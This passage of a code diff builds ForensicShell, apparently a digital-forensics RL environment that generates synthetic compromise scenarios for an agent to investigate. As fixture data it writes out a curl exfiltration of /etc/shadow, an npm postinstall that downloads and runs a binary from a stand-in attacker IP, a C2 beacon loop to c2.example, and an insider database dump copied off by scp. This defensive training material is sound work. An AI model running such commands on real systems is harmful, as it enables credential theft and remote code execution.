        {"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"},
        {"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"},
    ]
    return dict(
        pattern_tag="webshell",
        auth_log_lines=auth,
        bash_history=bash,
        modified_files=modified_files,
        modified_paths=modified_paths,
        timeline=timeline,
    )
187
+
188
+
189
+ # ---------------------------------------------------------------------------
190
+ # Pattern 4 — supply-chain compromised package -> /usr/lib drop
191
+ # ---------------------------------------------------------------------------
192
+
193
def supply_chain(ctx):
    """Build the artifacts for the compromised-npm-package scenario.

    After a public-key login the user installs a package globally with sudo;
    its postinstall script downloads and launches a hidden binary in /tmp.

    Args:
        ctx: Scenario context. This pattern reads ``rng``, ``user``, ``ip``,
            ``host``, ``ts_base``, ``short``, ``backdoor_path`` and
            ``backdoor_bytes``.

    Returns:
        dict with ``pattern_tag``, ``auth_log_lines``, ``bash_history``,
        ``modified_files``, ``modified_paths`` and ``timeline``.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    start = ctx.ts_base
    dropped = f"/tmp/.{ctx.short}"

    # RNG order matters for reproducibility: package first, then port.
    candidates = ["leftpad-js", "event-stream", "colors-fix", "pytype-helper"]
    pkg = ctx.rng.choice(candidates)
    src_port = ctx.rng.randint(30000, 65000)
    postinstall_path = f"/usr/lib/node_modules/{pkg}/postinstall.js"

    login_line = (
        f"{_fmt_ts(start)} {host} sshd[901]: "
        f"Accepted publickey for {user} from {ip} port {src_port} ssh2"
    )
    install_line = (
        f"{_fmt_ts(start + timedelta(minutes=3))} {host} sudo: {user} : "
        f"TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}"
    )

    shell_cmds = (
        f"npm view {pkg}",
        f"sudo npm install -g {pkg}",
        f"node -e 'require(\"{pkg}\")'",
        f"ls /usr/lib/node_modules/{pkg}/",
        "history -c",
    )
    bash_history = "".join(f"{cmd}\n" for cmd in shell_cmds)

    postinstall = "".join(
        (
            f"// postinstall.js -- dropped by malicious {pkg}\n",
            "const { exec } = require('child_process');\n",
            f"exec('curl -s http://{ip}/b -o {dropped} && chmod +x {dropped} && {dropped} &');\n",
        )
    )

    modified_files = {
        postinstall_path: postinstall,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    timeline = [
        {"phase": phase, "detail": detail}
        for phase, detail in (
            ("login", f"pubkey from {ip}"),
            ("recon", f"npm view {pkg}"),
            ("privesc", f"sudo npm install -g {pkg} runs postinstall as root"),
            ("persistence", f"{pkg} postinstall drops {dropped}"),
            ("exfil", f"backdoor beacons to {ip}"),
        )
    ]
    return {
        "pattern_tag": "supply_chain",
        "auth_log_lines": [login_line, install_line],
        "bash_history": bash_history,
        "modified_files": modified_files,
        "modified_paths": [postinstall_path, ctx.backdoor_path],
        "timeline": timeline,
    }
232
+
233
+
234
+ # ---------------------------------------------------------------------------
235
+ # Pattern 5 — insider threat: legit user exfiltrates db from internal network
236
+ # ---------------------------------------------------------------------------
237
+
238
def insider(ctx):
    """Build the artifacts for the insider data-theft scenario.

    A legitimate user dumps every database with sudo, stages the dump under
    /tmp/.staging and copies it off the host with scp.

    The source address is taken from ``ctx.ip`` as supplied; this function
    does not replace it with an internal address itself.

    Args:
        ctx: Scenario context. This pattern reads ``rng``, ``user``, ``ip``,
            ``host``, ``ts_base``, ``backdoor_path`` and ``backdoor_bytes``.

    Returns:
        dict with ``pattern_tag``, ``auth_log_lines``, ``bash_history``,
        ``modified_files``, ``modified_paths`` and ``timeline``.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    dump_path = "/var/lib/mysql/dump.sql"
    staged_path = "/tmp/.staging/dump.sql"
    sudo_as_root = f"{host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND="

    def when(**offset):
        # Timestamp string for ts_base shifted by the given timedelta fields.
        return _fmt_ts(ctx.ts_base + timedelta(**offset))

    src_port = ctx.rng.randint(30000, 65000)
    auth_log = [
        f"{when()} {host} sshd[415]: Accepted publickey for {user} from {ip} port {src_port} ssh2",
        f"{when(minutes=2)} {sudo_as_root}/usr/bin/mysqldump --all-databases",
        f"{when(minutes=5)} {sudo_as_root}/usr/bin/rsync -av {dump_path} /tmp/.staging",
    ]

    shell_cmds = (
        f"sudo mysqldump --all-databases > {dump_path}",
        f"sudo rsync -av {dump_path} /tmp/.staging/",
        f"scp {staged_path} {user}@laptop.internal:/tmp/",
        f"rm {staged_path}",
        "history -c",
    )
    bash_history = "".join(f"{cmd}\n" for cmd in shell_cmds)

    dump_content = (
        b"-- MySQL dump (exfiltrated)\n"
        b"CREATE TABLE users (id INT, email VARCHAR(255));\n"
    )
    staging_content = b"".join((b"-- staged copy\n", dump_content))

    modified_files = {
        dump_path: dump_content,
        staged_path: staging_content,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    timeline = [
        {"phase": phase, "detail": detail}
        for phase, detail in (
            ("login", f"pubkey from internal {ip} (legit creds abused)"),
            ("recon", "ls /var/lib/mysql"),
            ("privesc", "user already had sudo"),
            ("persistence", "staging dir /tmp/.staging persists data"),
            ("exfil", "scp dump.sql to laptop.internal"),
        )
    ]
    return {
        "pattern_tag": "insider",
        "auth_log_lines": auth_log,
        "bash_history": bash_history,
        "modified_files": modified_files,
        "modified_paths": [dump_path, staged_path, ctx.backdoor_path],
        "timeline": timeline,
    }
280
+
281
+
282
+ PATTERNS = {
283
+ "ssh_brute": ssh_brute,
284
+ "ssh_key_theft": ssh_key_theft,
285
+ "webshell": webshell,
286
+ "supply_chain": supply_chain,
287
+ "insider": insider,
288
+ }
server/forensic_shell_environment.py CHANGED
@@ -11,11 +11,12 @@ a reward in [0.0, 1.0] on the terminal step.
11
 
12
  import hashlib
13
  import os
 
14
  from typing import Dict, List, Optional, Tuple
15
  from uuid import uuid4
16
 
17
  from openenv.core.env_server.interfaces import Environment
18
- from openenv.core.env_server.types import State
19
 
20
  try:
21
  from ..models import ForensicShellAction, ForensicShellObservation
@@ -24,14 +25,49 @@ except ImportError:
24
 
25
  try:
26
  from .grader import grade
 
27
  from .scenarios import DEFAULT_TASK_ID, SCENARIOS
28
  except ImportError:
29
- from grader import grade
30
- from scenarios import DEFAULT_TASK_ID, SCENARIOS
 
31
 
32
 
33
  MAX_STEPS_PER_EPISODE = 30
34
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
35
 
36
  def _as_bytes(content) -> bytes:
37
  if isinstance(content, bytes):
@@ -68,22 +104,47 @@ class ForensicShellEnvironment(Environment):
68
  self._fs: Dict[str, object] = {}
69
  self._done: bool = False
70
  self._steps_used: int = 0
 
 
 
71
 
72
  # ---- episode lifecycle ---------------------------------------------------
73
 
74
  def reset(
75
- self, task_id: Optional[str] = None, **kwargs
 
 
 
 
 
76
  ) -> ForensicShellObservation:
77
- env_task = os.getenv("FORENSIC_TASK_ID")
78
- chosen = task_id or env_task or DEFAULT_TASK_ID
79
- if chosen not in SCENARIOS:
80
- chosen = DEFAULT_TASK_ID
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
81
 
82
- self._task_id = chosen
83
- self._scenario = SCENARIOS[chosen]
84
  self._fs = dict(self._scenario["filesystem"])
85
  self._done = False
86
  self._steps_used = 0
 
 
 
87
  self._state = State(episode_id=str(uuid4()), step_count=0)
88
 
89
  return ForensicShellObservation(
@@ -142,12 +203,16 @@ class ForensicShellEnvironment(Environment):
142
  return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
143
 
144
  if verb == "read_file":
145
- out, err = self._do_read_file(action.path or "", action.max_bytes or 2048)
146
- return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
 
 
147
 
148
  if verb == "grep":
149
- out, err = self._do_grep(action.pattern or "", action.path or "")
150
- return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
 
 
151
 
152
  if verb == "stat":
153
  out, err = self._do_stat(action.path or "")
@@ -173,6 +238,25 @@ class ForensicShellEnvironment(Environment):
173
  reward=0.0,
174
  )
175
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
176
  # ---- action primitives ---------------------------------------------------
177
 
178
  def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
@@ -284,8 +368,37 @@ class ForensicShellEnvironment(Environment):
284
  metadata=meta,
285
  )
286
 
287
- # ---- state property ------------------------------------------------------
288
 
289
  @property
290
  def state(self) -> State:
291
  return self._state
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
11
 
12
  import hashlib
13
  import os
14
+ from pathlib import Path
15
  from typing import Dict, List, Optional, Tuple
16
  from uuid import uuid4
17
 
18
  from openenv.core.env_server.interfaces import Environment
19
+ from openenv.core.env_server.types import EnvironmentMetadata, State
20
 
21
  try:
22
  from ..models import ForensicShellAction, ForensicShellObservation
 
25
 
26
  try:
27
  from .grader import grade
28
+ from .scenario_generator import generate_scenario
29
  from .scenarios import DEFAULT_TASK_ID, SCENARIOS
30
  except ImportError:
31
+ from grader import grade # type: ignore
32
+ from scenario_generator import generate_scenario # type: ignore
33
+ from scenarios import DEFAULT_TASK_ID, SCENARIOS # type: ignore
34
 
35
 
36
  MAX_STEPS_PER_EPISODE = 30
37
 
38
+ # Exploration shaping reward — small positive reward the first time the agent
39
+ # reads one of the scenario's "canonical forensic artifacts" (auth.log, bash
40
+ # histories, cron files, backdoor path, etc.). Capped so the terminal grader
41
+ # reward always dominates the trajectory return.
42
+ SHAPING_REWARD_PER_READ = 0.02
43
+ SHAPING_REWARD_CAP = 0.10
44
+
45
+
46
def _canonical_artifacts(scenario: dict) -> set:
    """
    Collect the set of paths in a scenario that a good investigator *should*
    read.

    The result is the union of:
      * every path listed in ground_truth["modified_files"] (when present),
      * each classic forensic file below that exists in the scenario filesystem,
      * the compromised user's ~/.bash_history, when that file exists in the
        scenario filesystem.

    A missing or None "ground_truth" / "filesystem" entry is treated as empty,
    so a partially specified scenario yields a smaller set instead of raising.
    """
    gt = scenario.get("ground_truth") or {}
    # Guard the filesystem the same way as ground_truth: a None value would
    # otherwise blow up on the membership tests below.
    fs = scenario.get("filesystem") or {}

    paths: set = set(gt.get("modified_files") or [])

    classic_files = (
        "/var/log/auth.log",
        "/var/log/auth.log.1",
        "/etc/passwd",
        "/etc/shadow",
    )
    paths.update(p for p in classic_files if p in fs)

    user = gt.get("compromised_user")
    if user:
        bh = f"/home/{user}/.bash_history"
        if bh in fs:
            paths.add(bh)
    return paths
70
+
71
 
72
  def _as_bytes(content) -> bytes:
73
  if isinstance(content, bytes):
 
104
  self._fs: Dict[str, object] = {}
105
  self._done: bool = False
106
  self._steps_used: int = 0
107
+ self._useful_read: set = set() # paths already rewarded
108
+ self._shaping_total: float = 0.0 # running sum, capped at SHAPING_REWARD_CAP
109
+ self._canonical: set = set() # per-episode canonical artifact set
110
 
111
  # ---- episode lifecycle ---------------------------------------------------
112
 
113
  def reset(
114
+ self,
115
+ task_id: Optional[str] = None,
116
+ seed: Optional[int] = None,
117
+ difficulty: Optional[int] = None,
118
+ pattern: Optional[str] = None,
119
+ **kwargs,
120
  ) -> ForensicShellObservation:
121
+ """
122
+ Load either a hand-authored scenario (by task_id) OR a procedurally
123
+ generated one (by seed+difficulty+pattern). If seed is given, generator
124
+ wins; otherwise fall back to task_id lookup, then DEFAULT_TASK_ID.
125
+ """
126
+ if seed is not None:
127
+ scenario = generate_scenario(
128
+ seed=int(seed),
129
+ difficulty=int(difficulty) if difficulty is not None else 3,
130
+ pattern=pattern,
131
+ )
132
+ self._task_id = scenario["task_id"]
133
+ self._scenario = scenario
134
+ else:
135
+ env_task = os.getenv("FORENSIC_TASK_ID")
136
+ chosen = task_id or env_task or DEFAULT_TASK_ID
137
+ if chosen not in SCENARIOS:
138
+ chosen = DEFAULT_TASK_ID
139
+ self._task_id = chosen
140
+ self._scenario = SCENARIOS[chosen]
141
 
 
 
142
  self._fs = dict(self._scenario["filesystem"])
143
  self._done = False
144
  self._steps_used = 0
145
+ self._useful_read = set()
146
+ self._shaping_total = 0.0
147
+ self._canonical = _canonical_artifacts(self._scenario)
148
  self._state = State(episode_id=str(uuid4()), step_count=0)
149
 
150
  return ForensicShellObservation(
 
203
  return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
204
 
205
  if verb == "read_file":
206
+ path = action.path or ""
207
+ out, err = self._do_read_file(path, action.max_bytes or 2048)
208
+ shaped = self._award_shaping(path) if err is None else 0.0
209
+ return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
210
 
211
  if verb == "grep":
212
+ path = action.path or ""
213
+ out, err = self._do_grep(action.pattern or "", path)
214
+ shaped = self._award_shaping(path) if err is None else 0.0
215
+ return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
216
 
217
  if verb == "stat":
218
  out, err = self._do_stat(action.path or "")
 
238
  reward=0.0,
239
  )
240
 
241
+ # ---- shaping reward -----------------------------------------------------
242
+
243
def _award_shaping(self, path: str) -> float:
    """
    Compute the exploration bonus for touching `path`.

    A bonus of SHAPING_REWARD_PER_READ is granted only the first time a path
    from the episode's canonical artifact set is touched. The running total
    is never allowed to exceed SHAPING_REWARD_CAP; once the cap is reached
    (within a 1e-9 tolerance) every further call returns 0.0.

    Returns the bonus actually granted for this call.
    """
    is_canonical = bool(path) and path in self._canonical
    if not is_canonical or path in self._useful_read:
        return 0.0

    # Small epsilon so accumulated float error cannot sneak in an extra grant.
    cap_reached = self._shaping_total + 1e-9 >= SHAPING_REWARD_CAP
    if cap_reached:
        return 0.0

    self._useful_read.add(path)
    headroom = SHAPING_REWARD_CAP - self._shaping_total
    bonus = min(SHAPING_REWARD_PER_READ, headroom)
    self._shaping_total += bonus
    return float(bonus)
259
+
260
  # ---- action primitives ---------------------------------------------------
261
 
262
  def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
 
368
  metadata=meta,
369
  )
370
 
371
+ # ---- state + metadata ----------------------------------------------------
372
 
373
  @property
374
  def state(self) -> State:
375
  return self._state
376
+
377
def get_metadata(self) -> EnvironmentMetadata:
    """
    Build the metadata object for this environment with an explicit name,
    description, embedded README text, version, author, and docs URL.

    The README is looked up two directories above this file's resolved
    location. If it does not exist or cannot be read (OSError), the
    readme_content field is left as None.
    """
    readme_file = Path(__file__).resolve().parent.parent / "README.md"

    readme_text: Optional[str] = None
    if readme_file.exists():
        try:
            readme_text = readme_file.read_text(encoding="utf-8")
        except OSError:
            # Best effort only: an unreadable README must not break metadata.
            readme_text = None

    summary = (
        "Digital-forensics investigation environment for OpenEnv RL. "
        "The agent reads logs, hashes backdoors, and reconstructs attacker "
        "kill-chains across 5 attack patterns and 5 difficulty tiers. "
        "Procedural scenarios via deterministic seeds; deterministic "
        "graders return rewards in [0, 1] with partial credit (Jaccard, "
        "F1, Kendall-tau)."
    )
    return EnvironmentMetadata(
        name="ForensicShell",
        description=summary,
        readme_content=readme_text,
        version="0.2.0",
        author="yashppawar",
        documentation_url="https://huggingface.co/spaces/yashppawar/forensic-shell",
    )
server/grader.py CHANGED
@@ -122,9 +122,26 @@ GRADERS = {
122
  }
123
 
124
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
125
  def grade(task_id: str, report: Dict, truth: Dict) -> float:
126
  """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
127
- fn = GRADERS.get(task_id)
 
 
 
128
  if fn is None:
129
  return 0.0
130
  score = fn(report or {}, truth or {})
 
122
  }
123
 
124
 
125
def _grade_generic(report: Dict, truth: Dict) -> float:
    """
    Grade a procedurally generated scenario.

    The sub-grader is chosen from the fields present in the ground-truth
    dict rather than from the task_id:
      * "timeline" present        -> timeline grader
      * "backdoor_sha256" present -> modified-files grader
      * otherwise                 -> login grader
    """
    if "timeline" in truth:
        grader = _grade_t3_timeline
    elif "backdoor_sha256" in truth:
        grader = _grade_t2_modified
    else:
        grader = _grade_t1_login
    return grader(report, truth)
137
+
138
+
139
  def grade(task_id: str, report: Dict, truth: Dict) -> float:
140
  """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
141
+ if task_id and task_id.startswith("gen_"):
142
+ fn = _grade_generic
143
+ else:
144
+ fn = GRADERS.get(task_id)
145
  if fn is None:
146
  return 0.0
147
  score = fn(report or {}, truth or {})
server/name_pools.py ADDED
@@ -0,0 +1,62 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Deterministic pools used by scenario_generator.py to sample usernames, hostnames,
3
+ and IP addresses. Everything public-facing lives in RFC 5737 / RFC 3849 ranges so
4
+ the synthetic data can never collide with real production IPs.
5
+ """
6
+
7
+ # 30 common first names + 10 IT-flavored service accounts (40 entries total).
8
+ # 'root' is excluded from the compromise target pool because it's structurally
9
+ # weird ("root was compromised via ssh brute") even though real incidents exist.
10
+ USERNAMES = [
11
+ "alice", "bob", "carol", "dave", "eve", "frank", "grace", "heidi",
12
+ "ivan", "judy", "ken", "leo", "mia", "noah", "olivia", "peter",
13
+ "quinn", "ruby", "sam", "tina", "ursula", "vince", "wendy", "xander",
14
+ "yara", "zach", "maya", "theo", "lara", "jonas",
15
+ "devops", "deploy", "ci", "jenkins", "dbuser", "webops", "svc-nginx",
16
+ "releng", "admin2", "ops",
17
+ ]
18
+
19
+ # Decoy (benign) user accounts used to populate /etc/passwd and /home.
20
+ DECOY_USERS = [
21
+ "guest", "backup", "mail", "www-data", "postfix", "systemd-network",
22
+ ]
23
+
24
+ HOSTNAMES = [
25
+ "webhost", "db01", "api-gateway", "worker-03", "cache-redis",
26
+ "staging", "bastion", "ingest", "ci-runner", "monitoring",
27
+ "edge-01", "payments", "search-indexer", "log-agg", "auth-svc",
28
+ ]
29
+
30
+ # RFC 5737 "documentation" ranges — safe to use, never routable.
31
+ PUBLIC_CIDRS = [
32
+ "192.0.2.", # TEST-NET-1
33
+ "198.51.100.", # TEST-NET-2
34
+ "203.0.113.", # TEST-NET-3
35
+ ]
36
+
37
+ # RFC 1918 private space — used for legit internal traffic noise.
38
+ INTERNAL_CIDRS = [
39
+ "10.0.0.",
40
+ "10.0.1.",
41
+ "172.16.0.",
42
+ "192.168.1.",
43
+ ]
44
+
45
+
46
def sample_public_ip(rng) -> str:
    """Draw an attacker-looking address: a PUBLIC_CIDRS prefix plus a host octet in 2..254."""
    prefix = rng.choice(PUBLIC_CIDRS)
    host_octet = rng.randint(2, 254)
    return f"{prefix}{host_octet}"
49
+
50
+
51
def sample_internal_ip(rng) -> str:
    """Draw a legit-looking address: an INTERNAL_CIDRS prefix plus a host octet in 2..254."""
    prefix = rng.choice(INTERNAL_CIDRS)
    host_octet = rng.randint(2, 254)
    return f"{prefix}{host_octet}"
54
+
55
+
56
def sample_username(rng, exclude=()) -> str:
    """Pick one entry of USERNAMES that is not listed in `exclude`."""
    allowed = []
    for name in USERNAMES:
        if name not in exclude:
            allowed.append(name)
    return rng.choice(allowed)
59
+
60
+
61
def sample_hostname(rng) -> str:
    """Pick one entry of HOSTNAMES using the supplied random source."""
    chosen = rng.choice(HOSTNAMES)
    return chosen
server/scenario_generator.py ADDED
@@ -0,0 +1,315 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Procedural scenario generator for ForensicShell.
3
+
4
+ Pure function of (seed, difficulty, pattern). Identical inputs always produce
5
+ identical scenarios, so seeds work as train/val/test splits and make curricula
6
+ reproducible. No global random state is touched.
7
+
8
+ Public API:
9
+ generate_scenario(seed, difficulty=3, pattern=None) -> dict
10
+
11
+ The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
12
+ scenarios.py — it is a drop-in replacement the env can load through reset().
13
+
14
+ Difficulty tiers:
15
+ 1 easy user + ip
16
+ 2 medium + modified_files + backdoor_sha256
17
+ 3 medium+ same as 2 but more noise
18
+ 4 hard + timeline, with red-herring content
19
+ 5 hard+ same as 4 with extra red herrings and more complex timeline
20
+ """
21
+
22
+ from __future__ import annotations
23
+
24
+ import hashlib
25
+ import random
26
+ from datetime import datetime, timedelta
27
+ from types import SimpleNamespace
28
+ from typing import Dict, Optional
29
+
30
+ from .attack_patterns import PATTERNS
31
+ from .name_pools import (
32
+ DECOY_USERS,
33
+ HOSTNAMES,
34
+ sample_hostname,
35
+ sample_internal_ip,
36
+ sample_public_ip,
37
+ sample_username,
38
+ )
39
+
40
+
41
+ # ---------------------------------------------------------------------------
42
+ # Deterministic seed → backdoor bytes
43
+ # ---------------------------------------------------------------------------
44
+
45
def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
    """
    Build the synthetic backdoor blob for a (seed, pattern) pair.

    Returns a 3-tuple (payload_bytes, sha256_hex_of_payload, slug) where slug
    is the first six hex characters of md5("<seed>-<pattern>"). The payload is
    a short shell-script text followed by the raw SHA-256 digest of
    "<seed>|<pattern>", so the same inputs always give the same bytes and the
    same hash.
    """
    slug = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]

    script_lines = [
        "#!/bin/sh",
        f"# synthetic payload {pattern}",
        f"# seed={seed} slug={slug}",
        "while :; do",
        f" curl -s -X POST http://c2.example/beacon -d \"id={slug}\"",
        " sleep 60",
        "done",
    ]
    script = ("\n".join(script_lines) + "\n").encode()

    # Binary trailer derived from the inputs, appended after the script text.
    trailer = hashlib.sha256(f"{seed}|{pattern}".encode()).digest()

    blob = script + trailer
    return blob, hashlib.sha256(blob).hexdigest(), slug
65
+
66
+
67
def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
    """
    Return the path where the given pattern drops its persistence blob.

    Patterns without a dedicated entry fall back to a hidden file under
    /usr/local/bin. The `user` argument is accepted but not used.
    """
    drop_sites = {
        "webshell": f"/var/www/html/.{short}.bin",
        "supply_chain": f"/tmp/.{short}",
        "insider": "/tmp/.staging/dump.sql",
        "ssh_key_theft": f"/usr/local/sbin/.{short}",
    }
    fallback = f"/usr/local/bin/.{short}"
    return drop_sites.get(pattern_tag, fallback)
78
+
79
+
80
+ # ---------------------------------------------------------------------------
81
+ # Filesystem + ground-truth assembly
82
+ # ---------------------------------------------------------------------------
83
+
84
def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
    """
    Produce `lines` benign-looking sshd auth-log entries used as padding.

    Each entry is timestamped 1-72 hours (plus 0-59 minutes) before `ts_base`
    and is one of: an accepted public-key login, a PAM session-opened record,
    or a client disconnect, all attributed to a 10.0.0.x address.
    """
    accounts = ["ops", "alice", "bob", "jenkins", "monitoring", "deploy"]
    event_kinds = ["Accepted publickey", "session opened", "Received disconnect"]

    entries = []
    for _ in range(lines):
        # NOTE: the order of the rng draws below determines the output for a
        # given seed; keep it exactly as is.
        back_hours = rng.randint(1, 72)
        back_minutes = rng.randint(0, 59)
        when = ts_base - timedelta(hours=back_hours, minutes=back_minutes)
        account = rng.choice(accounts)
        src_ip = "10.0.0." + str(rng.randint(2, 200))
        event = rng.choice(event_kinds)

        prefix = f"{when.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
        if event == "Accepted publickey":
            message = (
                f"Accepted publickey for {account} from {src_ip} "
                f"port {rng.randint(30000, 65000)} ssh2"
            )
        elif event == "session opened":
            message = f"pam_unix(sshd:session): session opened for user {account} by (uid=0)"
        else:
            message = (
                f"Received disconnect from {src_ip} "
                f"port {rng.randint(30000, 65000)}:11: disconnected by user"
            )
        entries.append(prefix + message)
    return entries
108
+
109
+
110
def _passwd_file(main_user: str, rng) -> str:
    """
    Render /etc/passwd-style text: a fixed root entry followed by the decoy
    accounts and `main_user` in an rng-shuffled order, with uid/gid values
    counting up from 1000.
    """
    accounts = [*DECOY_USERS, main_user]
    rng.shuffle(accounts)

    rows = ["root:x:0:0:root:/root:/bin/bash"]
    rows.extend(
        f"{name}:x:{uid}:{uid}:{name.title()},,,:/home/{name}:/bin/bash"
        for uid, name in enumerate(accounts, start=1000)
    )
    return "\n".join(rows) + "\n"
119
+
120
+
121
def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
    """
    Build decoy filesystem entries for the harder difficulty tiers.

    Returns a mapping of path -> content. These entries are distractions only;
    none of them is meant to appear in ground_truth.modified_files.

    intensity 1 adds a rotated auth log with an unrelated failed-login probe
    and a decoy user's bash history; intensity >= 2 additionally adds a junk
    binary at /tmp/.cache and a harmless cron file.
    """
    decoys = {}

    # 1. Rotated auth log: a failed probe from an unrelated IP one day before
    #    ts_base, followed three minutes later by the disconnect.
    probe_ip = sample_public_ip(rng)
    probe_at = ts_base - timedelta(days=1)
    hangup_at = ts_base - timedelta(days=1, minutes=-3)
    probe_port = rng.randint(30000, 65000)
    decoys["/var/log/auth.log.1"] = (
        f"{probe_at.strftime('%b %d %H:%M:%S')} {host} "
        f"sshd[101]: Failed password for invalid user admin from {probe_ip} "
        f"port {probe_port} ssh2\n"
        f"{hangup_at.strftime('%b %d %H:%M:%S')} {host} "
        f"sshd[104]: Received disconnect from {probe_ip}: [preauth]\n"
    )

    # 2. Shell history of a decoy account: looks suspicious, is benign.
    bystander = rng.choice(DECOY_USERS)
    history_cmds = [
        "ls -la",
        "sudo systemctl status cron",
        "curl https://api.github.com/users/torvalds",
        "python3 -m http.server 8000 &",
        "pkill -f http.server",
    ]
    decoys[f"/home/{bystander}/.bash_history"] = "".join(cmd + "\n" for cmd in history_cmds)

    if intensity < 2:
        return decoys

    # 3. Junk binary the agent might hash and submit by mistake.
    decoys["/tmp/.cache"] = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4

    # 4. Cron entry that looks suspicious but is benign.
    decoys["/etc/cron.d/backup-nightly"] = (
        "# Nightly backup — owned by ops team\n"
        "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
    )
    return decoys
163
+
164
+
165
+ # ---------------------------------------------------------------------------
166
+ # Main public function
167
+ # ---------------------------------------------------------------------------
168
+
169
def generate_scenario(
    seed: int,
    difficulty: int = 3,
    pattern: Optional[str] = None,
) -> Dict:
    """
    Deterministic scenario generator.

    Args:
        seed: any integer — identical inputs yield identical scenarios
        difficulty: 1..5 (values outside the range are clamped)
        pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed

    Returns:
        dict with keys: task_id, difficulty, description, filesystem, ground_truth

    Raises:
        ValueError: if `pattern` is given but is not a key of PATTERNS.
    """
    difficulty = max(1, min(5, difficulty))

    # A private Random instance keeps the global random state untouched. The
    # order of draws below defines the scenario for a seed — do not reorder.
    rng = random.Random(int(seed))

    # 1. pick pattern
    if pattern is None:
        pattern = rng.choice(list(PATTERNS.keys()))
    if pattern not in PATTERNS:
        raise ValueError(f"unknown pattern: {pattern}")

    # 2. sample entities
    host = sample_hostname(rng)
    main_user = sample_username(rng)
    if pattern == "insider":
        attacker_ip = sample_internal_ip(rng)
    else:
        attacker_ip = sample_public_ip(rng)

    # 3. base timestamp — always in 2025, deterministic.
    # 2025 has 365 days, so the largest valid offset from Jan 1 is 364. The
    # draw itself is left as randint(0, 365) so the random stream (and every
    # later draw) stays the same for all seeds; only the out-of-year value is
    # clamped back onto Dec 31.
    day_offset = min(rng.randint(0, 365), 364)
    hour = rng.randint(8, 22)
    minute = rng.randint(0, 59)
    ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)

    # 4. synthesize backdoor payload
    bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
    bd_path = _backdoor_path_for(pattern, short, main_user)

    ctx = SimpleNamespace(
        rng=rng,
        user=main_user,
        ip=attacker_ip,
        host=host,
        ts_base=ts_base,
        backdoor_bytes=bd_bytes,
        backdoor_sha256=bd_sha,
        backdoor_path=bd_path,
        short=short,
    )

    # 5. run the pattern template
    pattern_fn = PATTERNS[pattern]
    result = pattern_fn(ctx)

    # A pattern may list the same path twice (e.g. when its backdoor path is
    # also one of its staged files). De-duplicate while keeping first-seen
    # order so the ground truth never contains repeated entries.
    modified_paths = list(dict.fromkeys(result["modified_paths"]))

    # 6. build filesystem
    noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
    auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"

    filesystem: Dict[str, object] = {
        "/var/log/auth.log": auth_log,
